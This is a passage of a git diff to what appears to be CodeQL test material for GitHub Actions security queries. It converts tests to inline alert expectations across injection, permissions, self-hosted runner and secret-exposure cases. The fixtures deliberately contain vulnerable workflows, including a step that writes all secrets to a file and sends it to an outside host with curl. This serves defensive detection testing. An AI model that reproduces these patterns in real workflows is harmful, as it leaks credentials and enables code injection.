.github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:13:19:13:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:14:19:14:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:15:19:15:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push.yml:16:19:16:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:9:19:9:57 | github.event.commits[11].message | ${{ github.event.commits[11].message }} | -| .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:10:19:10:62 | github.event.commits[11].author.email | ${{ github.event.commits[11].author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:11:19:11:61 | github.event.commits[11].author.name | ${{ github.event.commits[11].author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:12:19:12:57 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:13:19:13:62 | github.event.head_commit.author.email | ${{ github.event.head_commit.author.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:14:19:14:61 | github.event.head_commit.author.name | ${{ github.event.head_commit.author.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:15:19:15:65 | github.event.head_commit.committer.email | ${{ github.event.head_commit.committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:16:19:16:64 | github.event.head_commit.committer.name | ${{ github.event.head_commit.committer.name }} | -| .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:17:19:17:65 | github.event.commits[11].committer.email | ${{ github.event.commits[11].committer.email }} | -| .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/push_and_workflow_dispatch.yml:18:19:18:64 | github.event.commits[11].committer.name | ${{ github.event.commits[11].committer.name }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | .github/workflows/reusable-workflow-1.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | -| .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | -| .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:57:34:57:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:147:34:147:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:240:34:240:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:333:34:333:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:423:34:423:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:518:34:518:77 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test20.yml:15:54:15:94 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:22:35:22:73 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:23:36:23:74 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test21.yml:24:50:24:88 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | -| .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | -| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref index f7ce5674994..5717bcec732 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.qlref @@ -1 +1,2 @@ -Security/CWE-094/CodeInjectionMedium.ql +query: Security/CWE-094/CodeInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml index 5153e2cc780..34b85a6bd83 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-1395/.github/workflows/test1.yml @@ -14,8 +14,8 @@ jobs: - uses: actions/download-artifact@v3 # SECURE - uses: actions/download-artifact@v3.0.2 # SECURE - uses: actions/download-artifact@v4.1.0 - - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 - - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE + - uses: actions/download-artifact@eaceaf801fd36c7dee90939fad912460b18a1ffe # v4.1.2 # $ Alert + - uses: actions/download-artifact@9bc31d5ccc31df68ecc42ccf4149144866c47d8a # v3.0.2 # SECURE # $ Alert - uses: actions/download-artifact@v4 # SECURE - uses: actions/download-artifact@v4.1.7 # SECURE - uses: actions/download-artifact@v4.1.8 # SECURE diff --git a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref index c9bd66e4dd0..fe1d219fbff 100644 --- a/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref +++ b/actions/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.qlref @@ -1,2 +1,2 @@ -Security/CWE-1395/UseOfKnownVulnerableAction.ql - +query: Security/CWE-1395/UseOfKnownVulnerableAction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml index ed496f3eeb2..657204ffd53 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-200/.github/workflows/test1.yml @@ -13,4 +13,4 @@ jobs: with: args: > -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} + -Dsonar.pullrequest.key=${{ github.event.pull_request.title }} # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected index 59b58e03be7..75bf3897164 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.expected @@ -1,6 +1,6 @@ +#select +| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | edges nodes | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | subpaths -#select -| .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | Potential secret exfiltration in $@, which may be leaked to an attacker-controlled resource. | .github/workflows/test1.yml:15:11:16:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref index c750afbeaf4..48ae5cf9646 100644 --- a/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref +++ b/actions/ql/test/query-tests/Security/CWE-200/SecretExfiltration.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-200/SecretExfiltration.ql - +query: experimental/Security/CWE-200/SecretExfiltration.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml index f000ad6a287..2ee5623b64c 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml @@ -6,5 +6,5 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml index 6530bd5f08e..a26e39cbda0 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms10.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/ai-inference + - uses: actions/ai-inference # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml index 6f7844f17cb..4db5fc75523 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -7,7 +7,7 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - test: + test: # $ Alert name: Build and test runs-on: ubuntu-latest permissions: {} diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml index 4353c280497..c5448530fbb 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -7,6 +7,6 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml index 2824ca14a7e..ae9514f93e6 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms6.yml @@ -8,6 +8,6 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v2 - - uses: actions/jekyll-build-pages + - uses: actions/jekyll-build-pages # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml index 0ec255f0d10..85434ad0346 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms7.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/add-to-project@v2 + - uses: actions/add-to-project@v2 # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml index 1a10bd6a7d6..137fa791353 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms8.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/deploy-pages + - uses: actions/deploy-pages # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml index b6ae16bf9e2..8981c866382 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml +++ b/actions/ql/test/query-tests/Security/CWE-275/.github/workflows/perms9.yml @@ -7,4 +7,4 @@ jobs: name: Build and test runs-on: ubuntu-latest steps: - - uses: actions/delete-package-versions + - uses: actions/delete-package-versions # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref index ad1c6a99660..6837eb5124c 100644 --- a/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref +++ b/actions/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.qlref @@ -1,2 +1,2 @@ -Security/CWE-275/MissingActionsPermissions.ql - +query: Security/CWE-275/MissingActionsPermissions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml index 37eb2bddb58..24ad2ff91c8 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-284/.github/workflows/test1.yml @@ -8,13 +8,13 @@ jobs: runs-on: [self-hosted, X64, Linux, 16c32g] steps: - run: cmd - test2: + test2: # $ Alert runs-on: group: my-group labels: [self-hosted, label-1] steps: - run: cmd - test3: + test3: # $ Alert runs-on: - 'self-hosted' - 'linux' @@ -22,11 +22,11 @@ jobs: - 'metal' steps: - run: echo "foo" - test4: + test4: # $ Alert runs-on: self-hosted-azure steps: - run: cmd - test5: + test5: # $ Alert strategy: fail-fast: false matrix: @@ -63,7 +63,7 @@ jobs: runs-on: ${{ matrix.os }} steps: - run: cmd - test8: + test8: # $ Alert strategy: matrix: settings: @@ -75,14 +75,14 @@ jobs: runs-on: ${{ matrix.settings.host }} steps: - run: cmd - test9: + test9: # $ Alert strategy: matrix: os: ${{ github.repository }} runs-on: ${{ matrix.os }} steps: - run: cmd - test10: + test10: # $ Alert strategy: matrix: os: ${{ github.repository }} @@ -91,4 +91,4 @@ jobs: baz: "asdf" runs-on: ${{ matrix.foo.bar }} steps: - - run: cmd + - run: cmd # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref index dc99068b303..3c21812c0e7 100644 --- a/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref +++ b/actions/ql/test/query-tests/Security/CWE-284/CodeExecutionOnSelfHostedRunner.qlref @@ -1,2 +1,2 @@ -experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql - +query: experimental/Security/CWE-284/CodeExecutionOnSelfHostedRunner.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml index 48833460b44..4c8aa982c31 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-285/.github/workflows/test1.yml @@ -17,4 +17,4 @@ jobs: if: contains(github.event.pull_request.labels.*.name, 'safe to test') with: ref: ${{ github.event.pull_request.head.ref }} - - run: ./cmd + - run: ./cmd # $ Alert diff --git a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref index 09a19f21e3c..c62fedc2e7d 100644 --- a/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref +++ b/actions/ql/test/query-tests/Security/CWE-285/ImproperAccessControl.qlref @@ -1,2 +1,2 @@ -Security/CWE-285/ImproperAccessControl.ql - +query: Security/CWE-285/ImproperAccessControl.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml index 473d5998695..4d09af11cfd 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/secrets-in-artifacts.yml @@ -11,7 +11,7 @@ jobs: with: name: file path: . - test2: # NOT VULNERABLE + test2: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -29,7 +29,7 @@ jobs: with: name: file path: "*" - test4: # VULNERABLE + test4: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -40,7 +40,7 @@ jobs: with: name: file path: foo - test5: # VULNERABLE + test5: # VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -51,7 +51,7 @@ jobs: with: name: file path: foo/* - test6: # NOT VULNERABLE + test6: # NOT VULNERABLE # $ Alert[actions/secrets-in-artifacts] runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 @@ -83,5 +83,5 @@ jobs: uses: actions/upload-artifact@1746f4ab65b179e0ea60a494b83293b640dd5bba # v4.3.2 with: name: file - path: . + path: . # $ Alert[actions/secrets-in-artifacts] diff --git a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml index 614efab34c9..d476fab3ce4 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml +++ b/actions/ql/test/query-tests/Security/CWE-312/.github/workflows/test1.yml @@ -9,17 +9,17 @@ jobs: TOKENS: [WRITE, READ] steps: - run: | - echo '${{ toJSON(secrets) }}' > secrets.txt + echo '${{ toJSON(secrets) }}' > secrets.txt # $ Alert[actions/excessive-secrets-exposure] curl -X PUT -T ./secrets.txt -H http://3f750d39-1083-44e5-b057-40432fafeeb5.sink.reqsink.com - env: - ALL_SECRETS: ${{ toJSON(secrets) }} + ALL_SECRETS: ${{ toJSON(secrets) }} # $ Alert[actions/excessive-secrets-exposure] run: echo "$ALL_SECRETS" - env: - SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} + SOME_SECRETS: ${{ secrets[format('PAT_%s', matrix.TOKENS)] }} # $ Alert[actions/excessive-secrets-exposure] run: echo "$SOME_SECRETS" - env: - username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} - password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} + username: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientId }} # $ Alert[actions/unmasked-secret-exposure] + password: ${{ fromJson(secrets.AZURE_CREDENTIALS).clientSecret }} # $ Alert[actions/unmasked-secret-exposure] run: | echo "$username" echo "$password" diff --git a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref index 45f5ad80fd9..2341eea4546 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/ExcessiveSecretsExposure.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/ExcessiveSecretsExposure.ql - +query: Security/CWE-312/ExcessiveSecretsExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref index c9bb538a12d..ea9ad38301f 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/SecretsInArtifacts.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/SecretsInArtifacts.ql - +query: Security/CWE-312/SecretsInArtifacts.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref index ad4c8461523..be8a489a18b 100644 --- a/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref +++ b/actions/ql/test/query-tests/Security/CWE-312/UnmaskedSecretExposure.qlref @@ -1,2 +1,2 @@ -Security/CWE-312/UnmaskedSecretExposure.ql - +query: Security/CWE-312/UnmaskedSecretExposure.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml index 9f19634abc9..ffd8410a1a8 100644 --- a/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml +++ b/actions/ql/test/query-tests/Security/CWE-349/.github/workflows/code_injection1.yml @@ -8,5 